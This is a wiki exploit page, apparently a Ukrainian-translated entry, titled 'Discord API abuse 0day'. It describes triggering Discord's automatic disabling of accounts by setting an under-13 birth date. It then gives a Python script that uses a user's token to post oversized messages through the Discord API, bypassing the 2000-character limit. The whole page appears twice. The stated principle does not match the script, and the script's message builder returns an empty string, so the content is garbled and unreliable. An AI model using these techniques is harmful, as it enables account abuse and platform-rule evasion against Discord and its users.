Discord_API濫用0day_uk

# Discord API濫用0day/uk
{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Hand.png|50px]]
| 這個頁面需要補充，如果您了解該內容，請直接編輯詞條。
|}
|}

== Принцип вразливості: ==
Встановіть дату народження облікового запису менше 13 років, щоб вимкнути маркери, оскільки Discord автоматично вимкне облікові записи, власникам яких менше 13 років.

Зверніть увагу: ця уразливість не позначається на облікових записах, які вже налаштували DoB.

==EXP:==
Usage:

py example.py 

# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos

import requests
import random
import sys

class Exploit:

    def __init__(self, token, channel):
        self.token = token
        self.channel_id = channel
        self.headers = {'Authorization': token}

    @property
    def uri(self):
        chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
        return f''

    def execute(self):
        """ send magical URI """
        return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})

    
def main():
    if len(sys.argv) < 3:
        print(f'Usage: py {sys.argv[0]}  ')
        sys.exit()

    token = sys.argv[1]
    channel_id = sys.argv[2]

    exploit = Exploit(token, channel_id)

    exploit.execute()


if __name__ == '__main__':
    main()

== Автор: ==
Оригінальний автор невідомий.

{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Hand.png|50px]]
| 這個頁面需要補充，如果您了解該內容，請直接編輯詞條。
|}
|}

== Принцип вразливості: ==
Встановіть дату народження облікового запису менше 13 років, щоб вимкнути маркери, оскільки Discord автоматично вимкне облікові записи, власникам яких менше 13 років.

Зверніть увагу: ця уразливість не позначається на облікових записах, які вже налаштували DoB.

==EXP:==
Usage:

python example.py 

# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos

import requests
import random
import sys

class Exploit:

    def __init__(self, token, channel):
        self.token = token
        self.channel_id = channel
        self.headers = {'Authorization': token}

    @property
    def uri(self):
        chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
        return f''

    def execute(self):
        """ send magical URI """
        return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})

    
def main():
    if len(sys.argv) < 3:
        print(f'Usage: py {sys.argv[0]}  ')
        sys.exit()

    token = sys.argv[1]
    channel_id = sys.argv[2]

    exploit = Exploit(token, channel_id)

    exploit.execute()


if __name__ == '__main__':
    main()

== Автор: ==
Оригінальний автор невідомий.